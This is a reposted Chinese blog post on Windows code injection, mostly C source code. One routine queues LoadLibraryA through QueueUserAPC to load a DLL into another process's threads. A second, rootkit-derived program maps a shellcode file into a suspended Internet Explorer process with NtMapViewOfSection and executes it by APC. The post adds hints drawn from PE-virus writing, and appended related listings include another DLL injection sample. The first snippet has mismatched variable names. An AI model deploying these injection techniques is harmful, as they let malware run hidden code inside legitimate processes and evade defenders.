Code Inject的新技术

最新推荐文章于 2024-10-13 19:16:59 发布
转载 最新推荐文章于 2024-10-13 19:16:59 发布 · 924 阅读 · 0
文章标签:

#null #integer #attributes #file #winapi #thread

本文介绍了两种DLL注入方法,一种是一年前发现的方法,利用VirtualAllocEx和WriteProcessMemory分配内存并写入DLL路径,通过QueueUserAPC调用LoadLibrary加载DLL;另一种来自Rootkit,使用自定义的MyMapViewOfFileEx函数映射文件到进程地址空间,并通过QueueUserAPC安排执行映射的shellcode。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

inject的一般方法是:CreateRemoteThread;今天在Rootkit上看到一个新的方法,让我想起1年前我看到过的类似方法,大家一起看看这种方法吧:
1) 1年前我所看到的方法
    DWORD  dwResult;
    HANDLE hThread;
    HANDLE hProcess;
    char   szDllName[] = "c://MyDll.dll";
    int    nLen = strlen(szDllName) + 1;
    PVOID  pData= VirtualAllocEx(hProcess,
                                 NULL, 
                                  nLen, 
                                 MEM_COMMIT | MEM_TOP_DOWN, 
                                 PAGE_READWRITE);
    if (param != NULL)
    {
        if (WriteProcessMemory(hProcess, 
                                pData,
                               (LPVOID)szDllName,
                                len,
                                &ret))
        {
            for (DWORD p = 0; p < NumberOfThreads; p++) //寻找适当的线程
            {
                hThread = OpenThread(THREAD_ALL_ACCESS, 0, ThreadId[p]);
                if (hThread != 0)
                {
                    InjectDll(hProcess, hThread, (DWORD)pData);
                    CloseHandle(hThread);                                  
                }
            }
    } 

    void InjectDll(HANDLE hProcess, HANDLE hThread, DWORD param)
    {
        QueueUserAPC( (PAPCFUNC)GetProcAddress(GetModuleHandle
                      ("kernel32.dll"), "LoadLibraryA"),  
                      hThread,  
                      (DWORD)param )
            
    }


2) Rootkit上的方法,下面代码转自 http://www.rootkit.com/newsread.php?newsid=715

#define _WIN32_WINNT 0x0400
#include <windows.h>

typedef LONG NTSTATUS, *PNTSTATUS;
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

typedef enum _SECTION_INHERIT
{
ViewShare = 1,
ViewUnmap = 2
} SECTION_INHERIT;

typedef NTSTATUS (__stdcall *func_NtMapViewOfSection) ( HANDLE, HANDLE, LPVOID, ULONG, SIZE_T, LARGE_INTEGER*, SIZE_T*,
                SECTION_INHERIT, ULONG, ULONG );

func_NtMapViewOfSection NtMapViewOfSection = NULL;


LPVOID NTAPI MyMapViewOfFileEx( HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess, DWORD dwFileOffsetHigh,
        DWORD dwFileOffsetLow, DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress )   
{
NTSTATUS Status;
LARGE_INTEGER SectionOffset;
ULONG ViewSize;
ULONG Protect;
LPVOID ViewBase;


// Convert the offset
SectionOffset.LowPart = dwFileOffsetLow;
SectionOffset.HighPart = dwFileOffsetHigh;

// Save the size and base
ViewBase = lpBaseAddress;
ViewSize = dwNumberOfBytesToMap;

// Convert flags to NT Protection Attributes
if (dwDesiredAccess & FILE_MAP_WRITE)
{
  Protect  = PAGE_READWRITE;
}
else if (dwDesiredAccess & FILE_MAP_READ)
{
  Protect = PAGE_READONLY;
}
else if (dwDesiredAccess & FILE_MAP_COPY)
{
  Protect = PAGE_WRITECOPY;
}
else
{
  Protect = PAGE_NOACCESS;
}

// Map the section
Status = NtMapViewOfSection(hFileMappingObject,
        hProcess,
        &ViewBase,
        0,
        0,
        &SectionOffset,
        &ViewSize,
        ViewShare,
        0,
        Protect);
if (!NT_SUCCESS(Status))
{
  // We failed
  return NULL;
}

// Return the base
    return ViewBase;
}



int WINAPI WinMain (HINSTANCE, HINSTANCE, LPSTR, int)
{
HMODULE hDll = LoadLibrary( "ntdll.dll" );

NtMapViewOfSection = (func_NtMapViewOfSection) GetProcAddress (hDll, "NtMapViewOfSection");


// Getting a shellcode, use whatever you want
HANDLE hFile = CreateFile ("C://shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

HANDLE hMappedFile = CreateFileMapping (hFile, NULL, PAGE_READONLY, 0, 0, NULL);


// Starting target process
STARTUPINFO st;
ZeroMemory (&st, sizeof(st));
st.cb = sizeof (STARTUPINFO);

PROCESS_INFORMATION pi;
ZeroMemory (&pi, sizeof(pi));

CreateProcess ("C://Programme//Internet Explorer//iexplore.exe", NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &st, &pi);


// Injecting the shellcode into target process address space
LPVOID MappedFile = MyMapViewOfFileEx (pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);


// Create a new APC which will be executed at first when the thread resume
QueueUserAPC ((PAPCFUNC) MappedFile, pi.hThread, NULL);

ResumeThread (pi.hThread);


CloseHandle (hFile);
CloseHandle (hMappedFile);
CloseHandle (pi.hThread);
CloseHandle (pi.hProcess);
return 0;
}

总结:
 1 巧妙的应用了QueueUserAPC和Apc Queue,上述LoadLibrary动作和MappedFile的shellcode在目标线程被调度为运行状态的时候执行.

2 还记得APC Queue吗?
线程被重新调度为运行状态的时候会检查当前的Apc Queue,只有Queue中所有的Routine被执行完毕后,才执行线程原来被中断(入口)的代码.

3 第二个例子要自己写shellcode,关于如何定位函数,参见PE病毒写法,不要从栈地址找Kenel32的地址了,从TEB中的SEH地址找,默认(最外层)的处理Routine在Kenel32.dll中......  
Code Inject代码注入
每天进步一点点
08-12 4404
转3篇文章,地址是: Three Ways to Inject Your Code into Another Process http://www.codeproject.com/Articles/4610/Three-Ways-to-Inject-Your-Code-into-Another-Proces .NET Internals and Code In
代码注入器CodeInjector
12-01
代码注入器 CodeInjector 根据PID选择进程,可以载入dll 或者卸载dll 还可以执行代码 等等
.NET 代码注入 CodeInject
weixin_34166472的博客
04-25 189
CInject (or CodeInject) 允许直接往托管的代码中注入代码,而无需反编译。可在单个或者多个方法中注入你要执行的代码。使用 CInject 时你无需了解目标应用的细节,你通过注入来轻松对应用功能进行改造. Provides runtime intelligence such as  Values of arguments to the called function O...
推荐开源项目:CodeInject - 动态代码注入与运行时智能分析
gitblog_00100的博客
06-15 473
推荐开源项目:CodeInject - 动态代码注入与运行时智能分析 项目介绍 CodeInject 是一个强大而灵活的工具,它允许你在不重新编译的情况下对任何托管的.NET程序集进行代码注入。这个项目旨在简化为单个或多个方法甚至多个程序集插入拦截代码的任务,无论是用于日志记录、性能监控还是其他目的。 特别地,如果你有一个缺少诊断信息的现有代码库,你可以通过CodeInject轻松地添加这些功能,...
简单的InjectCode.rar
09-22
因此,开发者在学习和实践代码注入技术时,需要不断更新知识,适应新的安全挑战。 以上内容仅作为对VC++6.0环境下编写代码注入程序的一个简要介绍。在深入学习和实践之前,建议开发者充分理解相关的法律法规,确保...
DLL-Injection.zip_inject_inject code process
09-23
以上就是关于"DLL-Injection.zip_inject_inject code process"的压缩包内容和DLL注入技术的基本介绍。了解并熟练掌握这一技术,对于理解Windows系统工作原理和进行高级程序开发具有重要意义。不过,务必注意合法使用...
InjectCode.rar
07-09
《远程线程代码注入技术详解——基于VS2013》 远程线程代码注入是计算机编程中的一个高级技巧,通常用于系统监控、调试、安全测试等领域。在本文中,我们将深入探讨这一技术,结合使用Visual Studio 2013进行实际...
Windows-InjectCode
11-14
在Windows平台上,C/C++..."Windows-InjectCode"可能包含一系列示例代码和教程,帮助学习者实践这些技术。不过,需要注意的是,不当使用这些技术可能会违反法律,因此在实际应用时应遵守法律法规,尊重他人的知识产权。
CodeInject: 源代码注入工具的开源实现
这种扩展性使得CodeInject不仅限于当前支持的语言,用户可以根据需要添加新的脚本解释器或编译器。这一特性对于适应不断变化的技术环境和满足特定项目需求非常重要。 #### 开源软件的优势 - **透明性**: 源代码的...
CodeInjector
11-07
这是一个用来向指定进程注入代码/DLL的小工具,简单点说就是让某个进程执行你想让它执行的指令,或是让这个进程加载你/别人写的DLL模块,知道plugin的人应该很容易了解这是什么意思,暂时来说使用这个工具的人需要了解一定的汇编语言知识和Windows的进程/DLL机制
CodeInject.rar
09-23
code inject 逆向工程 做一些工具必备
CodeInjector 代码注入工具
10-17
CodeInjector 代码注入工具 CodeInjector 代码注入工具CodeInjector 代码注入工具
CodeInjector.rar
02-21
这个东东很方便测试Call,远程注入,调试Call,直接输入汇编代码,使用方便
代码注入器「Code Injector」-crx插件
03-09
将你的代码(html, css, js)注入到页面中。 将您自己的代码(html,css,js)插入任何页面。 自定义,配置,解析任何页面! 1.13的新功能:-图书馆! 1.14的新功能:-错误修正。 支持语言:English
【CTFshow】CodeInject
2301_80871705的博客
10-13 347
找到flag:ctfshow{228d1351-cab1-49dd-b650-2f5ca50471bd}system('ls /');发现了000flag.txt,查看这个文件。
CInject - Code Inject & Runtime Intelligence
听雨轩
09-02 268
可以拦截C#DLL的神器,比如要给一个现成的系统加个日志啥的。 CInject  ============================================ Project DescriptionCInject (or CodeInject) allows code injection into any managed assembly without disasse...
wifipineapple插件:codeInject的使用
weixin_34380948的博客
12-16 282
  如果在中间人攻击的时候, 能在用户的网页中插入任意代码, 可以说已经完成一半了   wifipineapple有个codeInject插件, 可以让连上这个网络所有设备浏览网页的时候, 在网页中插入任意html代码   但是目前我用的wifipineapple版本是MK4, 官方很久不维护这个版本的wifipineapple   使用scp把本地的codeinject传到wifipine...
Code Injector-crx插件
04-01
语言:English 将代码注入网站! (JavaScript,CSS,HTML和文件) 一个允许用户将代码注入网站的插件。 必须具备基本的Web编程知识,才能正确使用此附加组件。 文档(GitHub):https://github.com/Lor-Saba/Code-Injector
injectcode
最新发布
01-21
### 代码注入技术概述 代码注入是一种将外部代码引入目标应用程序的技术,使得这段代码能够在目标应用的上下文中运行。这种技术广泛应用于合法用途如调试、性能分析以及扩展功能;同时也可能被滥用于恶意目的,比如植入病毒或窃取数据。 #### Windows平台下的C/C++实现远程代码注入实例 对于Windows操作系统而言,可以利用WinAPI来完成这一过程。下面给出的是一个简单的例子,在此案例中选择了`lyshark.exe`作为宿主程序[^2]: ```cpp #include <windows.h> #include <stdio.h> int main() { DWORD pid; HANDLE hProcess, hThread; // 获取目标进程ID (这里假设已知) printf("Enter the PID of lyshark.exe: "); scanf("%lu", &pid); // 打开目标进程并获取句柄 hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); if (!hProcess) { printf("Failed to open process.\n"); return -1; } // 准备要注入的目标函数地址 LPVOID pLoadLibrary = (LPVOID)GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA"); // 创建内存空间并将DLL路径写入其中 char dllPath[] = "c:\\path\\to\\your\\dll.dll"; LPVOID pRemoteMem = VirtualAllocEx(hProcess, NULL, sizeof(dllPath), MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); WriteProcessMemory(hProcess, pRemoteMem, dllPath, sizeof(dllPath), NULL); // 创建新线程执行加载库操作 CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteMem, 0, NULL); CloseHandle(hProcess); } ``` 上述代码展示了如何创建一个新的线程去调用`LoadLibrary()`从而载入指定位置上的动态链接库(DLL),进而实现了跨进程边界的逻辑控制转移。 #### 使用Inject-Assembly简化代码注入流程 除了直接编写复杂的底层接口外,还有更简便的方法可供选择。例如,Inject-Assembly就是一个专为此设计的框架,它不仅支持通过编程手段定义待注入的内容,而且还配备了易于使用的命令行界面,极大地降低了入门门槛[^3]。 #### Webpack环境中的JavaScript代码热替换方案 针对前端开发领域,则有像inject-loader这样的工具能够很好地满足需求。这类插件可以在构建过程中自动向模块间插入额外的功能性脚本片段,帮助开发者快速迭代测试版本而无需每次都重新编译整个项目文件树结构[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值